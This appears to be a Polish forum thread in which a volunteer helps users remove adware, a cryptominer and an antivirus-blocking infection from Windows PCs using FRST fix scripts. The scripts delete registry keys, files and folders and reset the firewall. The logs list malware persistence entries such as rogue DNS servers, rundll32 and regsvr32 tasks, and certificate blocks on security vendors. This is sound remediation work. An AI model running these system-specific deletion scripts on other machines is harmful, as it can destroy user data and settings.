hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY3AhIJvu_GKNPKRRne9KKYIBGMlAfvzVPEu6IRkWYfMYxQsK97PcGedNV09gltPBVnZOip-UfdmwQYDWgROQfmhWKeDV18UOaE2GMJ0uATOOAlABFVlvrUnZB_WQ0FbI9fNHrbLBdS081XVAYoj9FP5ZYEO-rr7B_VgTPoTGo,&q={searchTerms} SearchScopes: HKU\S-1-5-21-3347351025-225361290-299367054-1000 -> {83F3BF0C-CB0F-44B8-AB52-32A7DAC715C9} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=H6Czbcnbl1BU,d77c5cb9-67e6-48fd-af3c-cb12171382bc, SearchScopes: HKU\S-1-5-21-3347351025-225361290-299367054-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iY3AhIJvu_GKNPKRRne9KKYIBGMlAfvzVPEu6IRkWYfMYxQsK97PcGedNV09gltPBVnZOip-UfdmwQYDWgROQfmhWKeDV18UOaE2GMJ0uATOOAlABFVlvrUnZB_WQ0FbI9fNHrbLBdS081XVAYoj9FP5ZYEO-rr7B_VgTPoTGo,&q={searchTerms} BHO: Brak nazwy -> {13D67BB7-DB5F-48AA-884D-7A5D94168509} -> Brak pliku BHO-x32: Brak nazwy -> {13D67BB7-DB5F-48AA-884D-7A5D94168509} -> Brak pliku IE Session Restore: HKU\S-1-5-21-3347351025-225361290-299367054-1000 -> [funkcja włączona] DeleteKey: HKCU\Software\Google\Chrome\Extensions DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins DeleteKey: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Policies DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\HD Ultra1 006-N C:\Program Files\Squarediarity in Board C:\Program Files\ATI\CO9KEI C:\Program Files\Common Files\Noobzo C:\Program Files\DVD Maker\1E3VTKPMH C:\Program Files\FreeDownloadManager.ORG\MO904LU821 C:\Program Files\Windows Defender\ERETNO3T2R477DXN6UMM5A C:\Program Files (x86)\KMSPico C:\Program Files (x86)\KMSPico 10.0.6 C:\Program Files (x86)\Maoha C:\Program Files (x86)\mgdisk C:\Program Files (x86)\Microleaves C:\Program Files (x86)\pccleanplus C:\Program Files (x86)\ProxyGate C:\Program Files (x86)\UCBrowser C:\Program Files (x86)\UltraISO C:\Program Files (x86)\WindowsTM C:\Program Files (x86)\YeaDesktop C:\Program Files (x86)\Common Files\Kayfresh C:\ProgramData\igfxDH.dll C:\ProgramData\smp2.exe C:\ProgramData\u3bO8YL0WR.ps1 C:\ProgramData\439b721f-0545-0 C:\ProgramData\439b721f-2141-1 C:\ProgramData\8d6cec6b-5411-0 C:\ProgramData\8d6cec6b-0ab5-1 C:\ProgramData\Logic Cramble C:\ProgramData\Microleaves C:\ProgramData\MicrosoftCorporation C:\ProgramData\PrefsSecure C:\ProgramData\SearchModule C:\ProgramData\Subair C:\ProgramData\Subairs C:\ProgramData\Microsoft\Windows\Start Menu\Programs\极速压缩 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mgdisk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinCDEmu C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YeaDesktop C:\Users\ABBA\AppData\Local\*.* C:\Users\ABBA\AppData\Local\AdvinstAnalytics C:\Users\ABBA\AppData\Local\b5b7887505f4482ea91c41b0cefd6850 C:\Users\ABBA\AppData\Local\CrashRpt C:\Users\ABBA\AppData\Local\jiobodfkmdffkcajblpbomgodflafoph C:\Users\ABBA\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk C:\Users\ABBA\AppData\Local\minergate-cli C:\Users\ABBA\AppData\Local\UCBrowser C:\Users\ABBA\AppData\Local\YjkhPack C:\Users\ABBA\AppData\Roaming\Uninstall.exe C:\Users\ABBA\AppData\Roaming\265459cc51d14714af05031c73ab5b09 C:\Users\ABBA\AppData\Roaming\BrowserModule C:\Users\ABBA\AppData\Roaming\Microleaves C:\Users\ABBA\AppData\Roaming\UCChannel C:\Users\ABBA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Electrum C:\Users\ABBA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\UC浏览器 C:\Users\ABBA\Downloads\KMSPico Setup.iso C:\Users\ABBA\Downloads\KMSpico_patch C:\Users\ABBA\Downloads\pobierz_*.exe C:\Users\Public\Desktop\Download Registrypatch....lnk C:\Users\Public\Desktop\magicdisk.lnk C:\Windows\msdownld.tmp C:\Windows\system32\*.tmp C:\Windows\system32\Drivers\cryptfd.sys C:\Windows\system32\Drivers\vcdrom.sys C:\Windows\SysWOW64\Auhardwaregl.dll C:\Windows\SysWOW64\findit.xml Folder: C:\Users\Public\Documents\XMUpdate CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Chrome jest mocno zainfekowane, więc najlepiej tu założyć nowy profil. Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML. Ustawienia > karta Ustawienia > Osoby > utwórz nowy profil i uruchom go > poprzednie okno Chrome zamknij i z poziomu nowego profilu skasuj w Osobach poprzedniego użytkownika. 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.

Wszystko zrobione. Na koniec: 1. Zastosuj DelFix, by usunąć używane narzędzia. 2. Wyczyść foldery Przywracania systemu: KLIK. 3. Zaktualizuj Internet Explorer do wersji 11 (nawet jeśli z niego nie korzystasz). Upewnij się, że reszta aktualizacji z Windows Update jest zaaplikowana. To wszystko.

Czy Chrome też było czyszczone? I zapomniałaś podać nowe logi FRST z opcji Skanuj. Trudno powiedzieć. Wstępna diagnostyka od strony software w tym artykule: KLIK.

Do usunięcia są jeszcze odpadkowe zadania w Harmonogramie. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: Task: {1E3E029E-8A67-41C1-B05D-8930D8D5061F} - System32\Tasks\{46FC16A6-753D-42E5-B569-E9091E9B0A2A} => D:\start.exe Task: {38E82E58-252D-4A9C-8EC7-9F068B4B458C} - System32\Tasks\{7FEE7A07-E358-4742-B1A4-A235E4A415ED} => D:\start.exe Task: {5072B7A2-BBA6-4B15-BB6C-FF7668A163DD} - System32\Tasks\{74B4FD57-CA51-464D-B2EB-BFA59E6D241D} => D:\start.exe Task: {52D5F3F8-BE38-49AF-A7A4-56E4E064D97A} - System32\Tasks\{114EA879-A4C5-4DC7-8487-67DDB07A3CDD} => C:\Program Files (x86)\LucasArts\Star Wars® Knights of the Old Republic® COLLECTION\swkotor.exe Task: {604A0514-77C2-4F27-AEF9-1A59B666D76F} - System32\Tasks\Microsoft\Windows\Windows Error Reporting\VideErroroReporting => C:\\ProgramData\\WindowsVideoErrorReporting\\wvermgr.exe Task: {777181A4-41A4-46A7-AFCE-910EF1FFA9F3} - System32\Tasks\{8F1F9A0F-CC95-4C47-B243-A24461635CD8} => D:\start.exe Task: {81136C5F-F319-4992-85B3-997CD9E0F60D} - System32\Tasks\{A8381DDB-DD9A-4E67-A55F-267A680D818E} => pcalua.exe -a C:\Users\Admin\Downloads\ME2_NormandyCrash.exe -d C:\Users\Admin\Downloads Task: {8CD04E0E-577F-49A3-9BEE-6014A1AD3299} - System32\Tasks\{5ECD89E2-2474-4DC7-BCB7-553BC440D67E} => D:\start.exe Task: {A07A2632-17EC-4ECD-A463-5F4E7FD770AA} - System32\Tasks\{B8064F46-7468-4884-97EB-94A83CBAED4C} => pcalua.exe -a C:\Users\Admin\Downloads\ME2_CerberusArc.exe -d C:\Users\Admin\Downloads Task: {A3AC129A-4982-4D0F-AE1F-7B5DC3ADB7B7} - \Hafez Video Converter -> Brak pliku Task: {B7C60ECE-E024-4D9D-A906-90F8B8A793FB} - System32\Tasks\{4B9EE198-1D99-448A-88F9-F284F386AA94} => pcalua.exe -a C:\Users\Admin\Downloads\ME2_Kasumi.exe -d C:\Users\Admin\Downloads Task: {B8991878-9CB9-4D98-875C-52ECC4609D0B} - System32\Tasks\{3D99E44C-7E90-4475-A0F7-0FBC509CAE45} => pcalua.exe -a C:\Users\Admin\Downloads\ME2_CerberusWpnArmor.exe -d C:\Users\Admin\Downloads Task: {BB99E143-5CC3-481F-95DA-6433998CCA09} - System32\Tasks\{170672F0-B11A-4925-A63A-AF8237EB888B} => pcalua.exe -a C:\Users\Admin\Downloads\ME2_Zaeed.exe -d C:\Users\Admin\Downloads Task: {D0C83FEB-3C85-4C69-A80C-BAABDAA1C3F3} - \SMW_UpdateTask_Time_313538383034363130352d3437415a556c2a3223346c41 -> Brak pliku Task: {E54CA4D8-8116-401B-ACD3-DC11EF34AA2E} - \UCBrowserUpdater -> Brak pliku Task: {F636BD17-054E-4458-A57C-D4755C858F6C} - System32\Tasks\{B3DBC376-C7E6-4FE0-B9FF-D5581F88B093} => pcalua.exe -a C:\Users\Admin\Downloads\nox_setup_v3.8.0.5_full_intl.exe -d C:\Users\Admin\Downloads Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt.

Nic nie było zmieniane jeszcze. Prawdopodobnie masz ustawione jakieś funkcje "autouzupełnień" URL, gdyż u mnie zarówno na Chrome jak i Firefox wklepanie gołego "fixitpc.pl" nie powoduje autoprzekierowania na "www.fixitpc.pl".

Nowa wersja FRST z poprawką właśnie wydana. Zaktualizuj FRST i zrób skan, ale dostarcz tylko log Addition.txt.

To proces powiązany z działaniem Harmonogramu zadań. Uprzednio były zadania adware w systemie, obecnie usunięte, więc możliwe że częstotliwość występowania tego procesu zmniejszy się. Pełna lista oprogramowania: Nie edytuj już pierwszego posta, dodając tam nowe logi. I uwaga na przyszłość: nie dostarczaj logów z katalogu C:\FRST\Logs (mają daty w nazwach) - to archiwum logów, bieżące są zawsze tam skąd uruchamiasz FRST - w przypadku ostatniej porcji logów był to Pulpit. Poprawki: 1. Usunięcie pozostałych szczątków. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: ShellIconOverlayIdentifiers: [BaiduAntivirusIconLock] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CC} => C:\Program Files\Baidu Security\Baidu Antivirus\5.4.3.148966.0\BavShx.dll -> Brak pliku Task: {EDE4AB9F-9564-4056-BD5D-DE65132B9CDD} - System32\Tasks\060184C3-9766-46a0-B258-F4518A0B2633 => Cscript.exe "C:\ProgramData\Baidu Security\Duplicaterecord.js" RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Morgan Stream Switcher StartBatch: del /q "C:\Users\Aga\Desktop\PULPIT\Avast Free Antivirus.lnk" del /q "C:\Users\Aga\Desktop\PULPIT\Continue Adobe Flash Player installation.lnk" del /q "C:\Users\Aga\Desktop\PULPIT\Continue CloneCD installation.lnk" del /q C:\Windows\Reimage.ini EndBatch: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Nie widzę zmian w Firefox, brak śladów resetu profilu. Podobnie w Chrome widać ustawienia Bing wprowadzone przez instalację PUP. Czyli wykonaj co mówiłam wcześniej i po tym zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut.

Fix FRST pomyślnie wykonany. AdwCleaner wykrył dwa odpadkowe klucze adware - uruchom program ponownie i tym razem przeprowadź usuwanie. Ale jeszcze nie kończymy tematu. Ze względu na błąd w FRST, Harmonogram zadań nie został poprawnie przeskanowany (zero wykrytych elementów, a spodziewane conajmniej kilka) i nie wiadomo co tam jest. Oczekuję na naprawę tego. Zawiadomię gdy pojawi się nowa wersja FRST i poproszę o nowy log Addition.txt. EDIT: Usuwam dodane logi. Na razie przecież nie ma nowej wersji FRST, więc logi pokazują nadal to samo co wcześniej. Jak mówiłam, zawiadomię, gdy pojawi się nowa wersja.

Wszystko zgodnie z planem, blokady programów zdjęte. Poprawki: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files\Plumbytes Software StartBatch: del /q C:\Users\Admin\Downloads\sp0twyow.exe netsh advfirewall reset EndBatch: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 2. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

W raportach widać infekcję DNS (Izraelskie adresy IP wstawione masowo dla wszystkich interfejsów sieciowych), a także zadania adware w Harmonogramie. Działania do przeprowadzenia: 1. Przez Panel sterowania odinstaluj: Badanie mające na celu poprawę produktów HP Deskjet 2540 series (zbędny program), Reimage Protector (wątpliwy program typu PUP), McAfee Security Scan Plus (zbędny program). Sugeruję także pozbyć się Baidu Antivirus ze względu na reputację producenta. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{61DAA90B-BF4B-4A43-9CE6-42A0042F900A}: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{91F0582E-3F06-4984-8A0F-02FFF7CAC157}: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{B0EED1B6-CB08-48FD-8EC9-4DE53AF502C5}: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{EC6C85EE-BC11-4C4E-BC8E-22B7F884A041}: [NameServer] 82.163.142.7 95.211.158.134 Tcpip\..\Interfaces\{EC6C85EE-BC11-4C4E-BC8E-22B7F884A041}: [DhcpNameServer] 82.163.142.7 Tcpip\..\Interfaces\{EE020378-6564-467D-A549-964357A0CF26}: [NameServer] 82.163.142.7 95.211.158.134 Task: {0006EC56-5C34-4D34-A4BA-77E658B7072A} - System32\Tasks\Price Fountain => C:\Users\Aga\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE <==== UWAGA Task: {0665EF15-6A1A-406C-BEB4-00649E3CE4F3} - System32\Tasks\{D19C68BE-9B62-4B50-B25B-B60FB75B4256} => pcalua.exe -a C:\Users\Aga\Downloads\jxpiinstall.exe -d C:\Users\Aga\Downloads Task: {3E77C65F-79B4-4614-86A5-8035F5898F41} - System32\Tasks\UpdateAdmin => C:\Users\Aga\AppData\Local\UpdateAdmin\UpdateAdmin.exe <==== UWAGA Task: {53C142B3-3A5B-4D96-B67D-DBB74D9774EC} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-30] (AVAST Software) Task: {B5221251-46B5-4EA1-9553-B86D37AD52A6} - System32\Tasks\MailRuUpdater => C:\Users\Aga\AppData\Local\Mail.Ru\MailRuUpdater.exe Task: {DBEF82AB-6677-4837-B3AA-86A5D1F3A8D7} - System32\Tasks\blogcreativeorglropsm => Chrome.exe blogcreative.org/lropsm <==== UWAGA Task: {F2AA0768-AF1C-46BD-8167-88AC6C706808} - System32\Tasks\AgaCuffingInnervationV2 => Rundll32.exe DazednessAtheisms.dll,main 7 1 <==== UWAGA Task: {F76BFCD1-5B31-4C2A-8892-9D7E412E6421} - System32\Tasks\{6F2BB630-31D6-4E4C-12D6-22B05E43802A} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~2\dd11eb1b\ae390402.dll" <==== UWAGA Task: C:\Windows\Tasks\ByteFence Scan.job => C:\Program Files\ByteFence\ByteFence.exe <==== UWAGA Task: C:\Windows\Tasks\Price Fountain.job => C:\Users\Aga\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE <==== UWAGA Task: C:\Windows\Tasks\Sparta D1.job => C:\Program Files\Google\Chrome\Application\chrome.exe ”--app=hxxp:/plarium.com/play/en/sparta/ <==== UWAGA Task: C:\Windows\Tasks\Sparta N.job => C:\Program Files\Google\Chrome\Application\chrome.exe ”--app=hxxp:/plarium.com/play/en/sparta/ <==== UWAGA Task: C:\Windows\Tasks\Sparta W1.job => C:\Program Files\Google\Chrome\Application\chrome.exe ”--app=hxxp:/plarium.com/play/en/sparta/ <==== UWAGA Task: C:\Windows\Tasks\Sparta W2.job => C:\Program Files\Google\Chrome\Application\chrome.exe ”--app=hxxp:/plarium.com/play/en/sparta/ <==== UWAGA S3 ALSysIO; \??\C:\Users\Aga\AppData\Local\Temp\ALSysIO.sys [X] U0 aswVmm; Brak ImagePath HKLM\...\Run: [] => [X] HKLM\...\Run: [Nvtmru] => "C:\Program Files\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe" HKU\S-1-5-21-2516821565-3541718767-3179136043-1000\...\Run: [BingSvc] => C:\Users\Aga\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2016-03-09] (© 2015 Microsoft Corporation) HKU\S-1-5-21-2516821565-3541718767-3179136043-1000\...\Run: [mailruhomesearch] => "C:\Users\Aga\AppData\Local\Mail.Ru\Sputnik\ptls\mailruhomesearch.exe" --pr_deferred GroupPolicy: Ograniczenia ? <======= UWAGA GroupPolicy\User: Ograniczenia ? <======= UWAGA HKU\S-1-5-21-2516821565-3541718767-3179136043-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.bing.com/search?q={searchTerms} HKU\S-1-5-21-2516821565-3541718767-3179136043-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://mail.ru/cnt/10445?gp=811040 SearchScopes: HKLM -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM -> ielnksrch URL = hxxp://www.bing.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-2516821565-3541718767-3179136043-1000 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = SearchScopes: HKU\S-1-5-21-2516821565-3541718767-3179136043-1000 -> {ielnksrch} URL = hxxp://www.bing.com/search?q={searchTerms} BHO: Ďîčńę@Mail.Ru -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\Aga\AppData\Local\Mail.Ru\Sputnik\IESearchPlugin.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-2516821565-3541718767-3179136043-1000_Classes\CLSID\{010833F3-751A-402F-9FCC-C365B6A12E41}\localserver32 -> C:\Users\Aga\Desktop\BESTplayer.exe => Brak pliku CustomCLSID: HKU\S-1-5-21-2516821565-3541718767-3179136043-1000_Classes\CLSID\{554EBE31-AEC1-4E34-BCE3-606467760D88}\localserver32 -> "C:\Users\Aga\AppData\Local\TNT2\2.0.0.2030\TNT2User.exe" => Brak pliku CustomCLSID: HKU\S-1-5-21-2516821565-3541718767-3179136043-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> "C:\Windows\system32\igfxEM.exe" => Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku DeleteKey: HKCU\Software\Google\Chrome\Extensions DeleteKey: HKLM\SOFTWARE\Google\Chrome\Extensions DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AVAST Software C:\Program Files\Common Files\AV\avast! Antivirus C:\Users\Aga\AppData\Local\Google\Chrome\User Data\System Profile C:\Users\Aga\AppData\Local\Mail.Ru C:\Users\Aga\AppData\Local\Microsoft\BingSvc C:\Users\Aga\AppData\Local\Opera Software C:\Users\Aga\AppData\Local\UpdateAdmin C:\Users\Aga\AppData\Local\{4F53AA78-FE9E-4769-B97D-CCF83A64758B} C:\Users\Aga\AppData\Local\{C8BB3E69-11C4-4B6B-B098-FF9E0CCB1647} C:\Users\Aga\AppData\Roaming\*.* C:\Users\Aga\AppData\Roaming\Opera Software C:\Windows\System32\Tasks\AVAST Software CMD: ipconfig /flushdns CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść przeglądarki: Firefox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść całą historię przeglądania. Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). 4. Zrób nowy log FRST z opcji Skanuj (Scan), z zaznaczonym polem Shortcut którego poprzednio zabrakło. Dołącz też plik fixlog.txt.

W systemie nadal działa ogromna ilość szkodliwych elementów, a antywirusy są zablokowane metodą Niezaufanych certyfikatów. Działania do przeprowadzenia: 1. Przez Panel sterowania odinstaluj wątpliwy program Plumbytes Anti-Malware 2017. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: R1 cryptfd; C:\Windows\System32\drivers\cryptfd.sys [195496 2017-05-25] () R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [25444] AlternateDataStreams: C:\Windows\system32\drivers:x64 [1498914] AlternateDataStreams: C:\Windows\system32\drivers:x86 [1223458] HKLM-x32\...\Run: [ProductUpdater] => C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe HKLM\...\RunOnce: [KOMPUTEREK] => C:\Windows\Temp\g445F.tmp.exe [313856 2017-06-11] () HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) HKU\S-1-5-21-1768268483-3808830105-315920841-1000\...\Run: [blueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe HKU\S-1-5-21-1768268483-3808830105-315920841-1000\...\Run: [e2r2-dqG-i.exe] => C:\Program Files\Windows Media Player\SYKUMONAG79KUXM4N3QUV5440\e2r2-dqG-i.exe [274944 2017-06-10] () HKU\S-1-5-21-1768268483-3808830105-315920841-1000\...\Run: [7QjUzbh.exe] => C:\Users\Admin\AppData\Local\Temp\bfd0ceadeeff4bb7b543fedb69ed363a\7QjUzbh.exe [274944 2017-06-10] () HKU\S-1-5-21-1768268483-3808830105-315920841-1000\...\Run: [g5r5bvtQx.exe] => C:\Users\Admin\AppData\Roaming\cc8a6a80f7fd4a7aadc900c39a1609f7\g5r5bvtQx.exe [274944 2017-06-10] () HKU\S-1-5-21-1768268483-3808830105-315920841-1000\...\Run: [G2SljB6G6ktJQ.exe] => C:\Users\Admin\AppData\Local\cfd39f6f03fe4cc399a0c58897b84128\G2SljB6G6ktJQ.exe [274944 2017-06-10] () HKU\S-1-5-21-1768268483-3808830105-315920841-1000\...\Run: [Goblyw3fZx.exe] => C:\Users\Admin\AppData\Roaming\2676253838a14647bbb331a1744e4bec\Goblyw3fZx.exe [274944 2017-06-10] () ShellIconOverlayIdentifiers: [JzShlobj] -> {9A0700D2-920A-4E52-8697-9B5230C92612} => C:\Program Files 